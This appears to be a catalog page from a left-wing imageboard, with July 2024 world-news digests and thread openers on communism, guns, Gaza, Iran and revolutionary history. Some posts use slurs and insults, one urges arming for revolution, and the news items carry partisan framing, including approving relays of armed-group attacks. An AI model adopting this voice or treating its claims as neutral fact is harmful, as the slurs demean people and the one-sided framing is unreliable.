Brazil’s spy agency accused of illegally targeting Bolsonaro’s foes
Those targeted allegedly include: the head of Brazil’s lower house, Arthur Lira, and his predecessor, Rodrigo Maia; prominent allies of the current leftwing president, Luiz Inácio Lula da Silva, including the senator, Randolfe Rodrigues; conservative figures including the former governor of São Paulo state, João Doria; four supreme court judges; two prominent political journalists, Vera Magalhães and Mônica Bergamo; and two senior officials from the environmental protection agency, Ibama, Hugo Loss and Roberto Cabral.

Mexican president-elect taps heir of leftist icons as her chief of staff
Cardenas, 60, is the son of Cuauhtemoc Cardenas, an elder statesman of Mexico's left who co-founded the Party of the Democratic Revolution (PRD), governed Mexico City, and ran for president three times. He is the grandson of former President Lazaro Cardenas, an icon of the Mexican left who governed between 1934-1940 and nationalized the oil industry in 1938.

Rival Bolivian party factions in street brawl
The clash outside the electoral tribunal lasted several hours with supporters of Mr Arce shouting his nickname and "you're not alone!" while those of Mr Morales yelled "Evo president, Evo president". The mayor of La Paz, who was on the scene appealing for calm, was injured when he was hit in the face by a stone.

Hamas proposes a national ‘non-partisan’ government to take over in Gaza after the war
Political bureau member Husam Badran said the group had “proposed that a government of national, non-partisan competencies take over the administration of the Gaza Strip and the West Bank after the war.” This came as Israeli forces left a trail of dead bodies and destruction as they withdrew from parts of Gaza City.

Israeli troops could be replaced by e-surveillance system on Egypt-Gaza border
The Israeli army could pull out of the border area between Egypt and the Gaza Strip and replace troops with an electronic surveillance system if a ceasefire deal is reached, reports said Friday. The plan is being discussed between Israeli and Egyptian ceasefire mediators, according to The Times of Israel which cited two Egyptian sources and another unnamed source familiar with the matter.

MSF Sudan evacuates ‘exhausted’ Khartoum team
In a press release on Wednesday, MSF Sudan emergency response head, Claire Nicolet, described the situation in and around the Turkish hospital, located in El Kalakla, a neighbourhood controlled by the Rapid Support Forces (RSF), as “untenable”. “Multiple violent incidents have taken place inside and outside the premises over the past 12 months, and the lives of our staff have been repeatedly threatened.”

Albania asks for help from EU Emergency Response Coordination Centre to tackle
There have been numerous wildfires in the southern district of Dropull, 250 kilometers south of the capital Tirana. Fires there have been made worse by wind with firefighters hampered by a lack of equipment and the means to access the remote mountainous areas.

France's CGT union federation calls for protests to force Macron to respect election results
THE biggest French union federation has called for mass demonstrations and possible strikes to push President Emmanuel Macron into “respecting the results” of Sunday’s legislative elections by allowing the New Popular Front (NPF) to form a government.

Thames Water hit with £39m of penalties after missing regulatory targets
Thames Water was hit with penalties of nearly £39m last year after missing a string of environmental targets and said its tumultuous corporate governance had damaged its reputation. The debt-laden company – which was this week put into special measures by the regulator, Ofwat – missed 21 regulatory targets last financial year in multiple areas, from pollution incidents to leakage and supply interruptions, a report said.

Jeremy Corbyn: 'Planting seeds of new politics'
Independent MP Jeremy Corbyn has laid out a political strategy for the Left in an article for the Guardian newspaper, saying he is "planting the seeds for a new way of doing politics" in Islington and beyond. Mr Corbyn will hold monthly "people’s forums", which he described as "a shared, democratic space" for local campaigns, and trade, tenants’ and debtors’ unions.

Pakistan’s New Military Operation Alarms Pashtuns
On June 25, the Pashtun Tahafuz Movement (PTM) launched a massive rally in the Khyber district. Thousands of people attended. The rally was called in response to the Pakistan federal government’s latest decision to launch a new military operation, named Azm-e-Istehkam, to counter the rising tide of terrorism in the country. The announcement came days after Chinese officials expressed displeasure over Pakistan’s deplorable security situation, and urged Islamabad to improve security for Chinese workers in Pakistan and the China-Pakistan Economic Corridor (CPEC) project.

Congress asks PM Modi to spell out his position on wealth tax on billionaires
“India has 167 dollar billionaires. A 2% wealth tax would raise 1.5 lakh crores each year - almost 0.5% of our GDP. This could pay for schools, hospitals, renewable energy, and many more essential investments in the future of our country,” Mr. Ramesh said.
R: 16 / I: 2
Uh oh! You see a flier on your way to work announcing a neo-fascist march in your area!

What do?
[obviously the answer will depend on your local conditions, so make sure to explain what makes your situation unique and how it justifies your actions or inaction]
R: 105 / I: 12

How can you unify earth?

What would it take to unify the planet? would it require an authoritarian state to forcibly unite the planet? can another pandemic help accelerate the unification?
R: 48 / I: 7


Neoliberalism as an era is already over. 1978 - 2017. All the redditors circle jerking over at /r/neoliberal, etc. are basically living in the past. The policy direction of most countries is already changing. The confusion lies with lefties such as socdems, socialists, and communists who assume the are only three possibilities are:

a) free trade, free markets, and free immigration
b) fordist keynesianism or socdem
c) socialism/communism

We obviously aren't in the latter two, so they assume that means that neoliberalism is done. But thats not really the case. Looking at the USA for example Biden is continuing a lot of the same shit as Trump including escalating or maintaining trade policies towards china.

The real policy consensus going forward will be:

d) none of the above.

The system will be neither Reaganism and his democratic imitators on the center left (Clinton, Obama). It will be ISOLATIONIST CAPITALISM.

What's the difference? Isolationist capitalism is still capitalist (obviously) and maintains relative free markets internally. But it prioritizes the industrial sector (both bourgeois and workers) over techno-finance capital. For that is all the battle between """left""" and right is in the US. Urban techno-finance capital vs extractive and industrial sectors. This nearly maps on to the geospatial divide between urban and rural/exurban.

Basically it will be capitalism but with restrictions on trade and tariffs intended to protect the domestic industrial bourgeoisie (and to a lesser extent, protecting "blue collar" jobs). It will be closer to the original liberalism than neoliberalism was, ironically. Since until 1913 there was no income tax so 95-100% of the governments revenue was made of tariffs on trade. Thus,
>the United States pursued a protectionist policy from the beginning of the 19th century until the middle of the 20th century. Between 1861 and 1933, they had one of the highest average tariff rates on manufactured imports in the world. However American agricultural and industrial goods were cheaper than rival products and the tariff had an impact primarily on wool products. After 1942 the U.S. began to promote worldwide free trade
so it wasn't until after ww2 that huge tariffs started to come down and international trade boomed as well. Really, the end goal is being as close to a capitalist version of north korea as possible. That the country will be internally capitalistic, but externally close to trade, immigration, and (hypothetically) war and military intervention.

Both sides of mainstream politics will agree to this and the only argument will be over lgbt vs not or abortion vs not, plus natalism vs anti natalism but more likely just how natalism should be implemented since if you don't have immigrations you need natalism to make warm bodies to be capitalist workers.
R: 610 / I: 333 (full)

Palestine vs. The Zionist Entity #89


🚨 Live Happenings/Updates 🚨

Al-Jazeera: hhttps://www.aljazeera.com/news/liveblog/2024/6/24/israel-war-on-gaza-live-israeli-tanks-surround-al-mawasi-safe-zone

Middle East Eye: https://www.middleeasteye.net/israel-palestine-hamas-war-gaza-live-invasion

The Guardian: https://www.theguardian.com/world/palestinian-territories

Times of Israel: https://www.timesofisrael.com/topic/liveblog/ (trigger warning)


Our own wiki. Be sure to add to it and create branching articles:



From the UK, single issue long time Palestinian investigative and general reporting, critical source

From the USA

Regional news from an anti-imperialist perspective

Premier Human Rights org

Left news and opinion webzine from Tel-Aviv

A collection of resources for organizers and anyone who wants to learn more about Palestine

Known anti-zionist academic Norman Finkelstein's blog



al-Qassam Brigades









(This includes blatantly obvious concern failtrolling/fedposting, painfully unfunny/nuclear misanthropic autism [ie. /pol/] and derailing/hyper sectarian schizophrenia)

Always remember to double-check your sources, as well as provide access to it.

الله أكبر
.الى جميع الكادحين في الشرق، ان مصيركم في ايديكم
!يا عمال العالم ويا شعوبه المضطهدة، اتحدوا
R: 26 / I: 0 (sage)

Socialist Democratic Stratocracy with Conscription is the way of the future.

We dont have to be anti gun and pro police to win over veterans and those disaffected by the status quo. We just have to be pro gun and pro military stratocracy. Hear me out. The military can abolish the police (pigs) by deputizing all military personnel and enforcing a policy of non-disciminatory conscription. This is objectively good for working toward full communism.
Stratocracy - only military personnel can govern
Conscription - everyone becomes military personnel as part of their duty to their country
Socialism - collectivization of all industry in common under the governing body's control with workplace democracy to determine production quotas, SOE business models and currency backed by hard material value
Communism - a stateless classless moneyless society with collectivized industry under the governing body's control with wirkplace democracy to determine production quotas, communal business models and the abolition of the division of labor that has plagued mankind since the agricultural revolution.
Hence SOCIALIST CONSCRIPTION-STRATOCRACY (with cybernetic economic planning in which humanity becomes the post-human biomechanical cyborg hivemind in charge of cybernetically planning the economy) is the closest next step toward communism beyond just plain bureaucratic ML socialism.
Also if you guys think this sounds scary, just remember, a morally ideal hivemind would function exactly like the internet, but you wouldnt have to worry about copyright law or viruses because your brain would be evolutionarily adapted to achieve its own, organic, super-computer form, which is capable of seamlessly integrating with the technological super-computer you own through constant self-modification to be extremely dynamic and responsive towards outside threats. Every lifeform on earth should ideally be assimilated, with respect for their individual and collective rights, basic needs and freedoms depending on their level of sentience, with lines of communication and direct hivemind links being established with the dolphins, whales, sharks, pigs, cats, cuttlefish, elephants, other primate species, and whatever else comes to mind. In doing so we should genetically enhance our species' bodies, including the forms of other animal species, to become more adaptable and capable of integrating better with the hivemind, with optimization and gene splicing to create maximum genetic variation and with catgirl/anthro/monstergirl hybridization programs to create an earth-wide gene pool for the species of earth to become entirely capable of overcoming any threat to life in general that the universe could throw at us. I also think we should make every species on earth capable of horozontal gene transfer so infectious disease can be massively collectively outcompeted by mutualistic species. This will achieve socialist immortality for the human species and enable us to become a space faring civilization capable of building a dyson sphere. The goal of course is to abolish the machine god/nature god dichotomy.
R: 8 / I: 1

==The mass media. The means of informantion. What is to be done? ==

What does leftypol think about the current of domination of media ownership by the capitalist class? How should media ownership be tackled? by demonizing evil billionaires for promoting right wing ideology? or by attacking the idea of private capitalist owned media as a system? Perhaps share some solutions.
R: 6 / I: 2

News 7/11/24

Palestinian Resistance Reveals New Missile, Hezbollah Releases New Drone Footage
The al-Qassam Brigades, the military wing of Hamas, announced that their fighters successfully detonated a locally manufactured anti-personnel explosive device called Ra’diya against an occupation foot patrol unit consisting of six soldiers in the southwestern axis of Tell al-Hawa. Reportedly, the operation killed and injured all members of the unit.

Guerrillas shoot down a Sikorsky helicopter and two drones of the Turkish army
The People’s Defense Forces (HPG) Press Centre released a written statement providing information on the latest situation and developments in the guerrilla-held Medya Defense Zones in southern Kurdistan (northern Iraq).

Kurdistan Communist Party holds sit-in against Turkish occupation attacks
The protesters carried banners that carried "No to the occupation" and others "The Iraqi government and the Regional Government must protect national security and borders and stand against the Turkish occupation," and "The Communist Party stands against foreign occupations and against any violations of opinion's freedom and expression."

Egyptian authorities on high alert ahead of 'Friday of dignity' protests
The hashtag, "Friday of Dignity" has been trending over the past few days after a video went viral depicting an unidentified man showing the controversial, mostly uninhabited, New Administrative Capital fully lit, during scheduled hours elsewhere of electricity blackouts during an unforgiving heatwave.

Kenyan president sacks cabinet after weeks of deadly protests
The sweeping cabinet changes on Thursday were what Kenyans had been asking for, the veteran anti-corruption activist John Githongo said. “Let us see what happens now if the new ministers deal with big issues around corruption and just the arrogance and excess of his administration and the fact that a lot of Kenyans died during the demonstrations,” he said. “Hopefully this should temporarily calm things.“

French trade unionist hints at Olympic protests if Macron blocks left from power
Sophie Binet, leader of the CGT union, said Macron was in denial about the result of the election and should appoint as prime minister whoever the NFP picks. Members of the alliance have been trying all week to agree on a name and a strategy to govern without a majority. "Emmanuel Macron must snap out of his denialism. He has lost the election … He's like Louis XVI holed up at Versailles. He must listen to the country and stop being so disconnected," Binet said on LCI television.

Pressure mounts on Labour to scrap cruel ‘sibling penalty’
The two-child benefit limit, introduced in 2017, stops parents from claiming universal credit or child tax credit for more than two children. But figures from the Department for Work and Pensions show 1.6 million children are now affected by the policy, rising by 100,000 in a year.

Pakistan says 1.45 million Afghans can stay for another year following UN refugee chief's visit
Afghan refugees with proper documentation will be able to remain in Pakistan until June 30, 2025, according to a statement issued by Prime Minister Shehbaz Sharif's office. On Tuesday, U.N. High Commissioner for Refugees Filippo Grandi urged Pakistani authorities to extend the validity of their registration cards — critical identity documents.

China building two-thirds of world’s wind and solar projects
Research published on Thursday by Global Energy Monitor (GEM), an NGO, found that China has 180 gigawatts (GW) of utility-scale solar power under construction and 15GW of wind power. That brings the total of wind and solar power under construction to 339GW, well ahead of the 40GW under construction in the US.

Japan and Philippines ink key military pact in defense ties upgrade
The agreement, which still needs parliamentary approval, will enable larger and more complex joint military exercises and grant the Self-Defense Forces greater access to Philippine bases, potentially even enabling rotational deployments.

Chileans confront a homelessness crisis, a first for one of South America’s richest countries
Chile said it has registered 21,126 homeless people this year, compared to 15,435 in 2020. Government figures rely on single-night snapshots by municipalities. Social workers put the real count around 40,000.

Colombia seeks UN support to revive peace process
Colombia’s government will seek emergency measures to implement a bogged down peace process with the now-defunct guerrilla group FARC, according to the foreign minister. On top of this, President Gustavo Petro will ask the United Nations security council to extend the peace process that was agreed with the former guerrillas in 2016, Foreign Minister Luis Gilberto Murillo told press.
R: 92 / I: 23

Iran president

Iran just elected a new president, Masoud Pezeshkian. He is supposedly a moderate and liberal on social issues (another electoral win for the left, I guess?).

Thoughts? How will this affect Iran's influence in the region?
R: 42 / I: 8 (sage)

If it weren't for the US, communism would've taken over the world.

Europe would've been the only force left to willfully oppose the USSR, but it was an inevitable losing battle.
the rest the of the world would've submitted.
>Africa was an underdeveloped shithole (and still is)
>middle east was still barely just starting to recover from it's medieval phase
>imperial Japan was going to get cucked either way eventually
North America was the last and only powerful bastion of capitalism, a geographical advantage that the capitalists lucked out with.
R: 62 / I: 17


please explain why capitalism can't just be saved from collapsing forever by just busting up monopolies and other large companies and just resetting the clock over and over. Can't capitalism theoretically be maintained forever this way?
>antitrust law is a collection of mostly federal laws that regulate the conduct and organization of businesses in order to promote competition and prevent unjustified monopolies
R: 32 / I: 5 (sage)

thirdies mentally colonized by America?

Today a friend of mine did some observation, which i never noticed but is actually true, we were talking about "media representation" on stuff like disney and the bald bitch on the groupie started whining and moaning about "why is there no princess from x third world region", i answered that is a stupid complaint and american companies obviously target their propaganda to white americans.
Then a friend noted how odd it was that thirdies didnt actually complained about the fact they consume american media, and that they are being brainwashed by american corporations, but that it is not explicitly catered for them, and that they for some reason wish the imperial core propaganda was catered for them instead of not receiving propaganda from america at all
R: 22 / I: 3

News 7/10/24

South Korea workers at Samsung announce indefinite strike action
The union said today that it was announcing an indefinite strike, accusing the management of being unwilling to negotiate. The NSEU’s demands include a 3.5 per cent pay rise, additional vacation days and compensation for all members who participated in the strikes.

A railway union strike in Sri Lanka leaves tens of thousands of commuters stranded
A railway union strike stopped most trains across Sri Lanka on Wednesday, leaving tens of thousands of passengers to brave the few dangerously overcrowded trains that kept running or be stranded at the station.

US-built pier will be put back in Gaza for several days to move aid, then permanently removed
The officials said the goal is to clear whatever aid has piled up in Cyprus and on the floating dock offshore and get it to the secure area on the beach in Gaza. Once that has been done, the Army will dismantle the pier and depart. The officials spoke on condition of anonymity because final details are still being worked out.

Iraq court sentences a widow of ISIL leader al-Baghdadi to death
An Iraqi court has sentenced a widow of late ISIL (ISIS) leader Abu Bakr al-Baghdadi to death for her role in the armed group and for detaining Yazidi women, the judiciary has announced.

Turkish state bombs KDP points in Sergelê
The Turkish state bombed Peshmerga points in Sergelê, located near Mount Metîna in Duhok. It was stated that some Peshmerga soldiers were injured as a result of the bombardment. On the other hand, it was learned that Turkey carried out bombardment on residential areas in the village of Mezi in the Amêdiyê district. After the bombing, the village was evacuated.

Showdown as Popular Front demands right to form a government - but Macron declines
FRANCE’S New Popular Front (NPF), which won the most seats in Sunday’s parliamentary election, has called on President Emmanuel Macron to ask it to form a government. But the president yesterday addressed the nation saying as no bloc had a majority, he intended to keep current Prime Minister Gabriel Attal in place until a compromise coalition had been built up – and even hinting it should not include representatives of the biggest part of the NPF, the left-wing France Unbowed.

Uproar Over Detention of Prominent French Scholar for Gaza Solidarity Posts
François Burgat, the 75-year-old research director emeritus at the French National Center for Scientific Research, was taken into custody Tuesday morning in the southern city of Aix-en-Provence as part of an investigation into "apology for terrorism," his lawyer Rafik Chekkat said on social media.

Russia bans Moscow Times in crackdown on independent media
Russia has classed the Moscow Times as an “undesirable organisation”, outlawing its activities inside Russia and leaving anybody who cooperates with it open to prosecution.

'Historic Victory': Ecuadorian Judge Rules Pollution Violates River's Rights
"The recognition of the Machángara River as an entity with its own rights goes beyond considering it a mere natural resource," the editorial asserted. "This progress means that the river now has legal protection, and the authorities have an obligation to ensure its health and well-being."

El Salvador’s president threatens to use gang-crackdown style tactics against price gougers
“I am going to issue a call, like we did to the gangs at the start of 2019,” Bukele said, referring to the year he was first elected. “We told them either stop killing people, or don’t complain about what happens afterward.” “Well, I’m going to issue a message to the importers, distributors and food wholesalers: stop abusing the people of El Salvador, or don’t complain about what happens afterward.”
R: 68 / I: 2 (sage)
Is robbing bookstores morally right or wrong?
Steal to read and acquire knowledge.
R: 86 / I: 13

The hate towards the Turkish

Why do some of leftists seem to hate the Turks as a whole, like fascists? This attitude towards Turks is especially prevalent in some anarchists, which is borderline racist. This attitude towards Turks only hurts the leftist movement in Turkey and helps the Grey Wolves.
R: 8 / I: 1  

Element Groups for Communists

Does anyone know if there are any active groups on Element that people can join to discuss Marxism?

Spent a while looking but can't find anything.

If I can't find one in a couple days, I'll make one and link it here.


In general, what are people's thoughts on using these types of services to compliment being involved in face to face IRL orgs?
R: 104 / I: 35

Weather Underground

I think reading up about these guys should be mandatory because they are a perfect illustration of what not to do. They were without a doubt perhaps the most incompetent and embarrassing armed group that has ever existed. Everyone, White Working class union members, Black Panthers and feminists all made fun of them and thought they were embarrassing retards
All their members hailed from very privileged backgrounds and were university students, Not surprisingly, when they were apprehended, only a handful faced any consequences or retribution from the government. Their grand "revolution" against the United States turned out to be a decade-long spree of meaningless bombings and vandalism. Law enforcement dubbed them the "toilet bombers" due to their penchant for targeting government building bathrooms. The pinnacle of their incompetence was when they accidentally blew up one of their own safe houses. Some of their members managed to evade capture for years(cause no one was actually looking for them), only to be astounded by the lenient punishment they received upon surrendering. cause law enforcement simply didn't deem them worth prosecuting. the majority of them are still alive and continue to enjoy their wealth to this day and are college professors and social activists.
R: 27 / I: 6

How to be an Isolated Communist.

I'm making this thread because I think my experience might be really similar to other people on this board.

I live in a large town in Europe, of about 100k people. I'm quite far from the capital or any actual city, and even if I lived there the only groups in my country are radlibs and socialdemocrats that are completely hypnotised by electoralism.

How does one be a good communist, where there is no party in existence, in your area or the country you are in? Is there any way to volunteer your time to any organisations like ICOR or ILPS in any significant way?

Even in larger countries, like France or Britain, the existing parties seem a bit pathetic, and not at all widespread. How you stop the waves of feelings of helplessness and apathy that comes from feeling like you don't have any realistic option to contribute to the movement?
R: 6 / I: 2

1965 Bulgarian Maoist coup attempt

>The 1965 Bulgarian coup d'état attempt was an attempt by officials in the Bulgarian Communist Party and officers in the Bulgarian People's Army to oust the leadership of the party, more specifically the General-Secretary Todor Zhivkov. These plans were foiled in April 1965 before the coup could be carried out.

>In October 1964 two members of the Central Committee of the Bulgarian Communist Party, Ivan Todorov-Gorunya and Tsolo Krastev , began to plot against Zhivkov. The conspirators were communists influenced by Mao Zedong of China, who denounced the leadership of the Communist Party for having become "opportunists" and for following the "revisionist" Soviet leader, Nikita Khrushchev. Although Khrushchev was removed on 14th of October, the conspirators aimed at establishing a Marxist-Leninist-Maoist Bulgaria. Several dozen officers joined, including the commander of the Sofia garrison General Tsvyatko Anev; the head of the personal cabinet of the Мinister of Defence, Colonel Ivan Velchev; the deputy chief of the Мain Political Directorate of the Bulgarian People's Army General Мicho Ermenov ; and the chief of department at the General Staff, General Lyuben Dinov.

>The plan was to execute the coup with the aid of the Bulgarian People's Army during the plenum of the Central Committee of the BCP. They planned to use the tank brigade based around Sofia, the Guard Division and the First Army headquarters in Sofia as a show of force against the party leadership.

>The conspirators aroused suspicion and a counter-intelligence operation carried out between 28 March and 12 April 1965 uncovered the scheme and arrested those involved. Some sources say that the leaders of the plot were being spied on even before 1964 because they were not fully trusted by the party leadership.The first arrested was General Anev on 8 April 1965. Following his arrest the coup leader, Todorov-Gorunya, committed suicide at home. On 12 April the rest of the plotters were arrested. Nine of them were court martialed and were given sentences varying from 8 to 15 years, and another 192 people were given administrative penalties.

>Rumors spread throughout Sofia about the suicide of a high-ranked party official and about the possibility of a plot against the current leadership. The state-controlled media, however, denounced all rumors as "fantastic fabrications and malicious propaganda."

I'm literally crying right now.
R: 75 / I: 19

Forms of proletarian organization

Political parties (electoral and vanguard)
Mutual Aid Groups
Worker Co-operatives
Labor Unions
Tenant Unions
Worker Councils (Soviets)
Worker Militias (Cadres)

Are these all the types of proletarian organizations? Are there any missing? How should these organizations relate to each other? Should they all submit to a party line? To what extent should they seek interclass help (legal counsel, charity, consumer cooperatives, educational institutions etc.). What about legal vs. illegal activity?
R: 17 / I: 5
any anarcho-maoists here?
anyone situationists pilled?

Mass line tactics + hyper reality manipulation + autonomous guerilla tactics + cultural subversion

"When we all realized it was over, it was."

escape your psychic prison
R: 7 / I: 2

3 July 1941 STALIN SPOKE

83 years ago on this day comrade Stalin gave this astounding speech for the mobilization of the USSR against Hitler's Germany. [[Zoom out on page / change theme to view]]

R: 15 / I: 2

News 7/9/24

Brazil Ratifies Trade Agreement with Palestine
“We are proud to be the first country in the bloc to ratify the free trade agreement with Palestine. But I cannot help regret that this occurs in a context in which the Palestinian people are suffering as a result of a completely irrational war.”

Deforestation in Colombia fell to historic lows in 2023, environment minister says
When elected in 2022, Petro vowed to halt record-high rates of deforestation in the Amazon by limiting agribusiness expansion into the forest and by creating reserves where Indigenous communities and others are allowed to harvest rubber, acai and other non-timber forest products. Advancing peace talks between the government and guerrilla groups in the area, along with financial incentives for farmers in the Amazon to help with conservation, drove the drop.

US military equipment and supplies arrive in Haiti
Over the last weekend, a US Air Force cargo plane arrived at the Toussaint Louverture International Airport with equipment including several MaxxPro armoured vehicles.

Records of ISIS members to be deployed to South Kurdistan exposed
The document contains the registration details of 416 Syrian paramilitary gangs that the occupying Turkish state plans to bring to South Kurdistan in the coming days. It is learned that some of them were trained by MIT (Turkish intelligence service) in Afrin centre and their total number exceeds 800.

Gaza authorities urge civilians to ignore Israeli 'death trap' evacuation orders
Palestinian journalist Bisan Owda reported from Gaza that the Israeli military had begun conducting attacks near the western neighbourhoods on Monday, despite ordering civilians to move there.

NATO signs $700 million Stinger missile contract as it makes plans to boost arms production
NATO has signed a nearly $700 million contract to have member countries produce more Stinger missiles, one of many steps the alliance is pressing at its summit in Washington to get each country to boost its own weapons production capabilities.

Barcelona protesters throw items and spray travelers with water while shouting ‘tourists go home’
About 2,800 people participated in the protest according to the Guàrdia Urbana de Barcelona, the municipal city police force, Spanish paper El País reported. But members of the protest group, the Assemblea de Barris pel Decreixement Turístic, which translates to the Neighborhood Assembly for Tourist Degrowth, say as many as 20,000 joined, the paper reported.

Paris prosecutor opens probe into Le Pen's 2022 campaign financing
The investigation, which was opened on July 2, follows a 2023 report by the National Commission on Campaign Accounts and Political Financing (CNCCFP), which scrutinizes candidates' election expenses and funding, the prosecutor's office said.

Blair urges more robots, fewer migrants
Mr Blair, who has returned to influence in Labour under Sir Keir Starmer’s leadership, said that the new government should address the “grievance” of those upset about immigration.

China launches high-level probe after paper says fuel tankers used to carry cooking oil
The Beijing News published a report last week alleging that the same tanker trucks were being used to transport both cooking oil and chemicals, without cleaning between shipments to save costs. The article has sparked public food safety concerns, with other state media also pressing for answers.

Farmers in north undone by chain of disasters
Thousands of farmers in the north have lost three crops in a row in back-to-back disasters since March with the ongoing flood, which has lasted for over three weeks in some places, unleashing the severest of blows. Many farmers are even in danger of losing their fourth crop, aman, the second-most important rice crop, due to the flood, despite the floodwater retreating in the past two days amid chances of returning soon thanks to an active monsoon.

Uber is cutting fares before Australia’s minimum gig work standards take effect, drivers say
Uber drivers say looming cuts to fares will squeeze them even more in a cost-of-living crisis, arguing the ride-hailing giant is reducing what they are paid before new standards under the government’s closing loopholes legislation are determined.
R: 10 / I: 1
What’s your opinion on? Mao Zedong Do you think he was a great leader or not?
R: 11 / I: 2

Fascism = Palingenetic Masculinity

Fascism is the ideology of palingenetic masculinity, the rebirth of hegemonic masculinity (the Männerbund) through war. Manu recreates the world by killing his hermaphroditic younger brother Yemno. Yemno is punished for the crime of being erghi, sissy, and the world is birthed from her penetration. The world is recreated through the domination of hegemonic masculinity over subordinate masculinity.

This does not mean subordinate masculinities are necessarily killed under patriarchy. Sometimes subordinate masculinities are idealized, and sometimes they are taboo. But subordinate masculinities are mystified and othered.

The first god was a woman. But the world of which the earth mother and the sky father are two parts of one whole, is the corpse of a shemale. So the gyn/ecology (mother earth) is founded on the death of anecology, the absence of an ecology. So fascism is founded on biofetishism, on sacrificing the hermaphrodite who is identified with death and life. Mother earth and sky father are made out of dominating the grave of the rectum.

Chaoskampf continues the founding of the world. Trito the third and youngest brother is gifted cattle by the gods. But Trito is weak, and his herd is abducted by Angus, the multiheaded serpent of the outsiders, a horde of big black bull dicks. Trito is gifted an intoxicating drink from the Storm-God, and is initiated into hegemonic masculinity. Trito is then able to defeat the assault of Angus on his masculinity, and retrieve his cattle. In thanks, Trito sacrifices a cow, and renews the world.

The intoxicating drink, the killing of Angus, and the ritual sacrifice of the cow are identified with the initiation and creation of hegemonic masculinity, and the ritual sacrifice of Yemno, a sissy. Angus is the absence, the negation, the plural, the hermaphroditic and deathly Other, a horde of castrated cow dick. Angus is then a phallic revenge against Trito the castrator. Once Angus is slain, clear and sweet not salty water is released. In thanks to the Storm-God, Trito does a very strange thing, Trito sacrifices a milkbearer, not a heifer or a steer.
R: 27 / I: 3

News 7/8/24

French vote gives leftists most seats over far right, but leaves hung parliament and deadlock
The results showed just over 180 seats for the New Popular Front leftist coalition, which placed first, ahead of Macron’s centrist alliance, with more than 160 seats. Marine Le Pen’s far-right National Rally and its allies were restricted to third place, although their more than 140 seats were still way ahead of the party’s previous best showing — 89 seats in 2022.

Two spectres from New Labour era appointed junior ministers
Ms Smith will enter the House of Lords to become an education minister and Mr Alexander, back as an MP after losing his seat in 2015, is now a business minister. Former Blair-era health secretary Alan Milburn, a longstanding advocate of greater private-sector involvement in the NHS, has also been tipped for a role in government relating to healthcare.

Media Orgs Condemn UP Police (first information report )FIR Against 2 Journalists for Posts on Muslim Man’s Alleged Lynching in Shamli
The cases have been lodged under the new criminal law, Bharat Nyaya Sanhita or BNS, invoking Sections 196 (promoting enmity between different groups) and 353 (making statements conducive to public mischief).

Two Indian soldiers, six rebels killed in Kashmir gun battles
Two Indian soldiers have been killed alongside six rebels in two separate gun battles in the Indian-administered Kashmir, according to the police, raising concerns about the security situation in the disputed Himalayan region. Kashmir police’s Inspector General Vidhi Kumar Birdi told the AFP news agency on Sunday that security forces “carried out two different operations” in villages in the Kulgam district in the disputed territory in which two soldiers were killed.

Myanmar Junta’s No. 2 Visits China Amid ‘Intense’ Fighting
The visit follows the collapse of a China-brokered ceasefire and the resumption of fighting in northern Shan State, where the forces of the Three Brotherhood Alliance of ethnic armed groups have gone on the offensive against the SAC since the last week of June.

Turkish military advances 15 km into Iraqi Kurdistan, triggering mass evacuations
The incursion, which represents a significant escalation in Turkey’s military operations, has unfolded amid a conspicuous silence from both Iraqi and Kurdish authorities, raising concerns over Iraq's sovereignty and the safety of its citizens. Ongoing operations have forced nearly 602 villages in Duhok province to evacuate, with villagers fleeing in fear of Turkish army shelling that has also scorched their farmland, according to a U.S.-based human rights organisation monitoring the conflict.

Iran election: Reformist lawmaker Masoud Pezeshkian wins presidential race
While Pezeshkian did not promise radical reforms to Iran’s theocratic method of government, which holds Supreme Leader Ali Khamenei as the final arbiter in significant matters, he pledged to make changes.

Thousands in pro-Palestinian protest in Morocco's Tangier
Thousands of Moroccans demonstrated on Sunday in the northern city of Tangier in support of the Palestinian people and against Morocco's ties with Israel, an AFP journalist saw.

Colombia registers slight drop in violence against social leaders
Like in previous years, many of the assassinations took place in Cauca, where illegal armed groups have been vying for control over territories abandoned by guerrilla group FARC in 2017.

Peru’s Congress approves statute of limitations for crimes against humanity committed before 2002
It could also benefit figures including former president Alberto Fujimori and retired military personnel accused of — or even convicted for — crimes committed between 1980 and 2000 during an internal armed conflict that left thousands of victims.According to the Peruvian prosecutor’s office, the legislation will have a direct impact on 550 victims and 600 cases, including investigations and judicial processes that would be archived or dismissed by statute of limitations.

Brazil's Bolsonaro formally accused over Saudi gifts, sources say
Brazilian federal police on Thursday formally accused former President Jair Bolsonaro of embezzlement for allegedly misappropriating jewelry he received while head of state, including luxury items given by the Saudi Arabian government, two police sources said.

Ecuadorians call for an end to Noboa’s austerity measures
Along with FUT, the Ecuadorian Confederation of Unitary Class Organizations of Workers (CEDOCUT), the Ecuadorian Confederation of Free Trade Union Organizations (CEOSL), the National Union of Educators (UNE), several federations of university and high school students, university professors, federations of physicians and retirees, and the political party Popular Unity (Unidad Popular) will also mobilize. In Quito, organizers will mobilize to the Carondelet Palace (the Government Palace) and deliver a letter to President Noboa, although according to his official agenda, he will not be in Ecuador.
R: 152 / I: 20

get guns

Guns are fun and necessary for the revolution.

Why not have a gun?
Reactionaries are armed to the teeth, why should leftist remain unarmed? Better to have a gun and not need it, than to need it and not have it. If you have kids at home keep the bullets locked up (or even at another address) and the gun unloaded.

At least buy a pellet gun and learn to shoot straight, handle the gun so familiarity can wash away the liberal anti-gun propaganda.

The more left leaning people with guns who learn couple things or two about guns the better. Objective fact!
R: 65 / I: 15
When you hear “sound money”

Please think “blind ideology”
R: 18 / I: 6 (sage)

The Industrial Revolution never happened. Humanity is only mechanizing now

The revolution from the development of steam power never happened, but that doesn’t mean that humanity never experienced an industrial boom. Simple tools and machines like lathes, mills, shapers, moulds, furnaces, hammers, screws, axes, wrenches, pickaxes, ropes, wheels, axles, wedges, and pulleys are all technologies that are thousands of years old, but they are the most commonly used tools in manufacturing and construction today. The revolution of industry was never found through the development of mechanization of industry, but through the mass participation of a greater share of humanity in industrial labour due to the rise of urbanism, liberalism, globalism, and socialism. Most people today work harder than they ever have, and they will only work harder as life expectancies and competition increases. The real Industrial revolution will occur through the development and implementation of automated machinery that only requires human administration than direct human labour.
R: 14 / I: 4 (sage)

Which side is /leftypol/ on?

What is the correct stance to take on the Eritrean war of independence? This seems like a conflict that requires a lot of nuance, although maybe it doesn't, so I want to learn more about it from /leftypol/. Who was in the right here?
R: 26 / I: 5

The global internet is on the chopping block and everybody wants to ignore it.

